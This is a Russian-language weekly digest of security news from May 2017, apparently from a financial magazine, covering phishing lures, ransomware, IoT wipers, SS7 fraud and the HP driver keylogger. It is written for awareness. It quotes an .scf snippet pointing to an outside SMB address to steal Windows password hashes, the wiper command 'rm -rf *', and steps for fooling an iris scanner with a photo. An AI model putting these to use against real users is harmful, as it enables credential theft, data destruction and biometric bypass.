Представляем новости об актуальных технологиях фишинга и других атаках на человека c 18 по 24 мая 2017 года.

Андрей Жаркевич
редактор, руководитель службы ИТ

Смартфоны, банкоматы и «умные» устройства

Google выпустила программу Google Play Protect для защиты устройств на базе Android. Google Play Protect помогает защититься от вредоносных программ и мошенников, и включает:

• Проверку приложений (включая анализ поведения уже установленных приложений, в том числе не из Play-маркета).
• Защиту от хищения устройства (Find My Device входит в состав программы).
• Защиту браузера (Safe Browsing в мобильном Chrome).

Технически Google Play Protect является частью приложения Google Play Store, поэтому от пользователей не требуется никаких дополнительных установок или активаций.

Сканер радужной оболочки глаза Samsung Galaxy S8 удалось обмануть с помощью обычной фотографии. Достаточно сфотографировать владельца Galaxy S8 так, чтобы его глаза были видны в кадре, затем распечатать полученное фото и продемонстрировать его фронтальной камере устройства.

Современные сканеры радужной оболочки глаза и системы распознавания лиц умеют отличать плоские изображения от реального человеческого глаза или лица. Чтобы обойти это, поверх фото глаза приклеили контактную линзу:

Рекомендуется делать фото в режиме ночной съемки, так как это позволит уловить больше деталей, особенно если глаза жертвы темного цвета.

Вредоносные программы Amnesia и BrickerBot атакуют IoT-устройства и удаляют с них все данные:

• Amnesia специализируется на камерах видеонаблюдения, работающих под управлением Linux. Получив доступ к устройству, она удаляет все доступные файлы с помощью shell-команды rm -rf *.
• BrickerBot действует аналогично, но пытается удалить файлы на всех смонтированных разделах, а затем отключает интернет-соединение, превращая устройство в «кирпич».

Вредоносные программы

Задержана группа хакеров, похищавших деньги с банковских счетов с помощью троянской программы для смартфонов. Преступники использовали два основных вектора заражения:

• СМС со ссылкой на троянскую программу.
• Фальшивые приложения.

Пример попытки заражения:

Наш автор ведет рубрику «Обезопашилово» в Тинькофф-журнале — тест о том, как не подарить деньги мошенникам. Подписывайтесь, чтобы проверить себя.

источник: Тинькофф-журнал

источник: Тинькофф-журнал

После установки программа помещалась в автозагрузку устройства и отправляла СМС на указанные преступниками телефонные номера, пересылала текст получаемых жертвой СМС-сообщений на удаленные сервера, а также скрывала поступающие СМС-уведомления от банка.

Общий ущерб оценивается, как минимум, в 50 млн. ?.

Пользователи популярных плееров: VLC, Kodi (бывший XBMC), Popcorn-Time и Stremio подвергаются серьезному риску из-за уязвимости в процессе загрузки и парсинга субтитров.

Атакующий может создать вредоносный файл с субтитрами, загрузка которого в медиаплеер приведет к выполнению произвольного кода, и позволит злоумышленнику полностью перехватить контроль над устройством:

В опасности как пользователи ПК, так и владельцы «умных» телевизоров и мобильных устройств.

Рекомендуется обновить свои медиаплееры и прошивки до последних версий.

Обнаружен червь EternalRocks, использующий сразу семь эксплойтов АНБ: EternalBlue, Eternalchampion, Eternalromance, Eternalsynergy, Doublepulsar, Architouch и SMBtouch.

EternalRocks маскируется под WannaCry, однако не вымогает выкуп, а готовит плацдарм для осуществления дальнейших атак. Для связи с управляющим сервером EternalRocks использует Tor.

Новое вредоносное ПО XData атакует украинских пользователей. 19 мая XData инфицировал в четыре раза больше украинских пользователей, чем WannaCry за неделю. Каким образом вредонос попадает на системы жертв, пока неизвестно.

Для шифрования файлов на зараженном компьютере XData использует AES. К зашифрованным файлам добавляется расширение ~xdata~. Кроме локальных файлов, вымогатель шифрует сетевые ресурсы. Инструмента для расшифровки файлов без уплаты выкупа в настоящее время не существует.

Сайты, мессенджеры и почта

Мошенники всё чаще используют для фишинговых атак сайты с HTTPS. Зелёная надпись «Надёжный» в строке адреса делает пользователей более доверчивыми.

Пользователи Chrome 56, Firefox 51, и более поздних версий этих браузеров видят предупреждения каждый раз, когда вводят свои учетный данные на сайтах, не использующих безопасный протокол HTTPS.

С конца января доля фишинга с использованием HTTPS выросла с 5% до 15%.

Выявлено несколько тысяч мошеннических сайтов, которые выманивают деньги доверчивых пользователей, соблазнившихся возможностью быстро заработать, выполняя несложные операции. Например, пользователю предлагается помочь «белым» хакерам в поиске уязвимостей на сайтах и получить за это вознаграждение:

Как правило за несколько минут удаётся «заработать» несколько тысяч рублей, но с их выводом из системы на банковскую карту, указанную при регистрации, возникают сложности:

Выводить деньги можно только после перехода на второй уровень, а для этого требуется перечислить 444 рубля на электронный кошелёк физического лица. Выполнив платёж, жертва так и не получает возможности вывести «честно заработанные».

Другие сайты предлагают оформлять брони столиков в ресторанах, одобрять кредиты и инвестировать в акции. Общая особенность у всех сайтов одна: они предлагают быстро заработать довольно серьёзные деньги, выполняя примитивные операции, а для вывода заработка требуется заплатить от 200 до 500 рублей.

Выявлено более 4 тысяч сайтов подобной тематики, на 100 самых популярных приходится около 10 миллионов посещений в месяц. Даже если каждый сотый посетитель заплатит 400 рублей, заработок мошенников может составить десятки миллионов в месяц.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 11 по 17 мая 2017 года.

Андрей Жаркевич
редактор, руководитель службы ИТ

Wanna Decrypt0r, распространяющийся через SMB — вторая версия вируса WannaCry, который сначала распространялся посредством фишинга. В данный момент существуют минимум три ветки шифровальщика:

• фишинговая (первая),
• с механизмом отключения через зарегистрированный домен (первая волна),
• без функции отключения.

По состоянию 22:00 14.05.2017 обнаружены второй и третий варианты вредоноса, в том числе без механизмов отключения через какой-либо домен.

Вредоносные программы

Вредоносная программа Adylkuzz, как и WannaCry, распространяется через уязвимость в SMB. Adylkuzz использует ресурсы системы для майнинга криптовалюты Monero. Заметить заражение сложнее, потому что единственный симптом — замедление работы системы.

Примечательно, что после заражения программа закрывает уязвимость в SMB, поэтому атакованные жертвы избежали заражения WannaCry:

Криптовымогатель Uiwix появился после WannaCry и распространяется через ту же уязвимость в SMB. Он действительно шифрует файлы жертв и не имеет механизма отключения через какой-то определенный домен: остановить его распространение нельзя так просто, как это получилось с первой версией WannaCry.

Зашифровав данные, Uiwix требует выкуп в размере 0.11943 бикоина (около $215 по текущему курсу).

Более двадцати различных ноутбуков и планшетов HP поставляются с  кейлоггером, встроенным в аудиодрайвер Conexant HD Audio Driver Package версии 1.0.0.46. Драйвер без ведома пользователей записывает все нажатия клавиш и хранят их в незашифрованном файле на жестком диске. Приложение MicTray64.exe устанавливается вместе с аудиодрайвером и сохраняет данные в файле C:\Users\Public\MicTray.log:

12 мая HP выпустила обновлённый драйвер, исправляющий эту проблему.

Сайты, мессенджеры и почта

Хакеры могут украсть имя Windows-пользователя и хеш пароля с помощью Google Chrome. Браузер автоматически загружает файлы .scf, которые считает безопасными.

.SCF files (Windows Explorer Command file) «scripting» documentation — обсуждение на форуме TechNet

Злоумышленники могут создать подобный .scf-файл:

[Shell]    
IconFile=\\123.123.123.123\icon

Chrome загрузит этот файл, а затем, когда пользователь будет просматривать содержащую его папку, Windows автоматически отправит данные аутентификации на удалённый SMB-сервер, подконтрольный мошенникам. После перехвата хэша пароль пользователя можно подобрать, например, при помощи таблиц, содержащих заранее вычисленные хэши всех возможных паролей.

Новая вредоносная кампания, направленная против пользователей мессенджера WhatsApp. Мошенники под видом ссылок на официальный сайт WhatsApp.com присылают жертвам ссылки на поддельный домен ш?атѕарр.com:

По ссылке пользователю предложат скачать приложение, которое якобы поможет сделать сообщения в мессенджере разноцветными. Затем пользователя заставят поделиться ссылкой с друзьями и группами в социальных сетях, чтобы подтвердить, что он не робот. Вместо цветных сообщений в WhatsApp жертва получает нежелательную рекламу.

Новый вымогатель Jaff распространяется со скоростью 5 миллионов писем в час. Спам-рассылку выполняет Necurs, один из крупнейших ботнетов в мире.

Jaff написан на языке C, подобно Locky, использует PDF-файлы, которые запускают Word с вредоносными макросами. В качестве выкупа за расшифровку файлов Jaff требует 2 биткоина, что составляет более $3000 по текущему курсу.

Уязвимость в браузере Microsoft Edge позволяет обойти Same Origin Policy (SOP) и похитить пароли и куки-файлы. SOP разрешает сценариям, находящимся на страницах одного сайта, доступ к методам и свойствам друг друга без ограничений, но предотвращает доступ к большинству методов и свойств для страниц на разных сайтах.

Мы учим сотрудников не переходить по ссылкам из писем или мессенджеров, даже если кажется, что они ведут на настоящий домен.

Атакующий может внедрить на своем сайте форму ввода пароля для чужого домена, а встроенный менеджер паролей Edge автоматически подставит в нее пароль пользователя. Аналогичным образом можно похищать и браузерные куки:

Клиенты поставщика технологии цифровой подписи документов DocuSign получили вредоносную спам-рассылку. Прикреплённый к письмам документ MS Word содержал макрос, загружающий на компьютер вредоносное ПО.

Рассылка стала результатом утечки данных, в результате которой злоумышленники получили адреса электронной почты всех клиентов DocuSign.

Дополнительно

Специалисты предупреждают о новом виде мошенничества: злоумышленник звонит жертве и несколько раз спрашивает, хорошо ли его слышно. Как правило, человек отвечает «да». Записанные ответы могут использоваться в системах с голосовой идентификацией для авторизации платежей или изменения учётных данных.

Поскольку используется реальный голос жертвы, оспорить проведённые операции практически невозможно.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 4 по 10 мая 2017 года.

Андрей Жаркевич
редактор, руководитель службы ИТ

Смартфоны, банкоматы и «умные» устройства

Компании шпионят за пользователями Android-смартфонов с помощью ультразвукового трекинга:

Технология ультразвукового межустройственного трекинга (uXDT) используется в рекламных роликах, куда добавляются специальные ультразвуковые сигналы в диапазоне от 18 до 20 кГц. Их не различает человеческое ухо, но может воспринимать микрофон смартфона. Это позволяет составить более полный профиль пользователя, получить более полный перечень его устройств, определить его интересы и выяснить другую личную информацию:

Privacy Threats through Ultrasonic Side Channels on Mobile Devices (ПДФ, 4,7 Мб)

• Микрофоны устройств поблизости улавливают сигнал из рекламного ролика.
• Если на устройстве установлено приложение с поддержкой uXDT, оно передаст на удаленный сервер сведения о том, что пользователь, который владеет телевизором марки А, только что прослушал рекламу, которую также «слышал» смартфон марки Б.

В Play Market есть уже 234 приложения, готовых к работе с этой технологией.

Обнаружен первый случай эксплуатации уязвимостей в сигнальных протоколах SS7 для обхода двухфакторной аутентификации и хищения денег с банковских счетов:

1. Злоумышленники используют вредоносные программы или фишинг для сбора информацию об аккаунте жертвы, ее учетных данных и номере телефона.
2. С помощью атаки на SS7 получают доступ к SMS-сообщениям, отправляемым на номер жертвы для подтверждения транзакций.
3. SMS-сообщение с нужным идентификатором mTAN (mobile transaction authentication number) переадресовывается на номер злоумышленников, которые могут войти в онлайн-банк и украсть деньги.

Gmail для Android получит специальную антифишинговую «заглушку», которая будет предотвращать моментальный переход по вредоносным ссылкам:

Если ссылка покажется фильтрам «Гугла» подозрительной, пользователь увидит предупреждение о том, что сайт, возможно, принадлежит мошенникам, которые пытаются украсть конфиденциальные данные и финансовую информацию. Предупреждение не заблокирует ссылку, но покажет пользователю возможные последствия его действий.

Функция появилась после нашумевшей атаки с поддельными документами Google Docs, которой на прошлой неделе подверглись более миллиона пользователей.

Подробности об атаке читайте в нашем прошлом дайджесте

Вредоносные программы

Обман пользователей через загрузку фиктивного «файла шрифта» теперь применяется против пользователей браузера Firefox:

Через спам-письма, рекламу или скомпрометированный сайт злоумышленники направляют пользователя на страницу, которая показывает уведомление о невозможности найти шрифт HoeflerText и предлагает загрузить «Mozilla Font Pack»:

Файл Mozilla_Font_v7.87.zip содержит скрипт Mozilla_Font_v7.87.js, после чего на экране появляется инструкция по установке «Mozilla Font Pack». Скрипт загружает и выполняет троянскую программу Zeus Panda.

Сайт популярного видео-конвертера HandBrake был скомпрометирован. Со 2 по 6 мая 2017 года с сайта download.handbrake.fr под видом HandBrake для macOS загружалась вредоносная программа Proton RAT.

Proton RAT не обнаруживается существующими антивирусными решениями для macOS, и в даркнете рекламируется как «профессиональное решение для слежки и контроля»: может получить root-доступ к устройству и перехватить полный контроль над ним.

Под видом бесплатных лицензионных ключей для антивируса распространяется троян MulDrop7. Cообщения от анонимных пользователей во «ВКонтакте» содержат сокращенную ссылку, которая ведет на файловый хостинг RGhost:

Жертве предлагается загрузить RAR-архив объемом порядка 26 Кбайт. Архив содержит исполняемый файл с иконкой обычного текстового документа.

Все изученные образцы представляют собой один и тот же бэкдор, однако перед размещением в интернете злоумышленники переупаковывают его во избежание сигнатурного обнаружения. В результате MulDrop7 долгое время не обнаруживается антивирусом Dr.Web — каждый новый образец начинает определяться только после очередного обновления вирусных баз.

MulDrop7 может по команде операторов заменить обои рабочего стола Windows, выключить или перезагрузить компьютер, вывести на экран системное сообщение с заданным текстом, поменять местами функции кнопок мыши, воспроизвести с помощью динамиков заданную фразу, используя голосовой синтезатор и выполнить другие команды.

Кроме того, MulDrop7 пугает своих пользователей, неожиданно воспроизводя на экране зараженной машины SWF-ролики со страшными звуками (пример для тех, кто не боится).